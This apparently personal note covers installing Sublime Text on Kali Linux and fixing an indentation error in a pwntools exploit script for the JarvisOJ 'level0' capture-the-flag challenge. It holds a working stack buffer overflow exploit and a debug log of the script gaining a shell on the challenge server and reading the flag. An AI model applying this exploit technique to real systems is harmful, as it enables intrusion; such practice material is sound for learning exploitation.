1.sublime安装
──(holyeyes㉿kali2023)-[~]
└─$ sudo dpkg -i sublime-text_build-4169_amd64.deb
[sudo] password for holyeyes:
Selecting previously unselected package sublime-text.
(Reading database ... 409163 files and directories currently installed.)
Preparing to unpack sublime-text_build-4169_amd64.deb ...
Unpacking sublime-text (4169) ...
Setting up sublime-text (4169) ...
Processing triggers for kali-menu (2023.4.3) ...
Processing triggers for desktop-file-utils (0.26-1) ...
Processing triggers for mailcap (3.70+nmu1) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
┌──(holyeyes㉿kali2023)-[~]
└─$ subl
2.解决pwn报错问题
2.1pwn脚本:0model.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pickle import TRUE
from pwn import *
import sys
context.terminal=["tmux","sp","-h"]
context.log_level='debug'
DEBUG = 1
LOCAL = True
BIN ='./level0'
HOST ='pwn2.jarvisoj.com'
PORT =9881
def get_base_address(proc):
return int(open("/proc/{}/maps".format(proc.pid), 'rb').readlines()[0].split('-')[0], 16)
def debug(bps,_s):
script = "handle SIGALRM ignore\n"
PIE = get_base_address(p)
script += "set $_base = 0x{:x}\n".format(PIE)
for bp in bps:
script += "b *0x%x\n"%(PIE+bp)
script += _s
gdb.attach(p,gdbscript=script)
# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
def exploit(p):
p.recv()
pl = 136*'a'+p64(0x0000000000400596)
p.sendline(pl)
p.interactive()
return
if __name__ == "__main__":
elf = ELF(BIN)
if len(sys.argv) > 1:
LOCAL = False
p = remote(HOST, PORT)
exploit(p)
else:
LOCAL = True
p = process(BIN)
log.info('PID: '+ str(proc.pidof(p)[0]))
# pause
if DEBUG:
debug([],"")
exploit(p)
2.2脚本出错信息
root@pwn_test1604:/ctf/work/1# python 0model.py
File "0model.py", line 41
p.interactive()
^
2.3解决方法
用vscode鼠标右键调出命令平台
输入convert indentation to Tabs,保存文件
完美解决,具体如下:
root@pwn_test1604:/ctf/work/1# python 0model.py 1
[DEBUG] PLT 0x40044c write
[DEBUG] PLT 0x400460 system
[DEBUG] PLT 0x400470 read
[DEBUG] PLT 0x400480 __libc_start_main
[DEBUG] PLT 0x400490 __gmon_start__
[*] '/ctf/work/1/level0'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[+] Opening connection to pwn2.jarvisoj.com on port 9881: Done
[DEBUG] Received 0xd bytes:
'Hello, World\n'
[DEBUG] Sent 0x91 bytes:
00000000 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 │aaaa│aaaa│aaaa│aaaa│
*
00000080 61 61 61 61 61 61 61 61 96 05 40 00 00 00 00 00 │aaaa│aaaa│··@·│····│
00000090 0a │·│
00000091
[*] Switching to interactive mode
$ ls
[DEBUG] Sent 0x3 bytes:
'ls\n'
[DEBUG] Received 0x10 bytes:
'flag\n'
'level0_x64\n'
flag
level0_x64
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x26 bytes:
'CTF{713ca3944e92180e0ef03171981dcd41}\n'
CTF{713ca3944e92180e0ef03171981dcd41}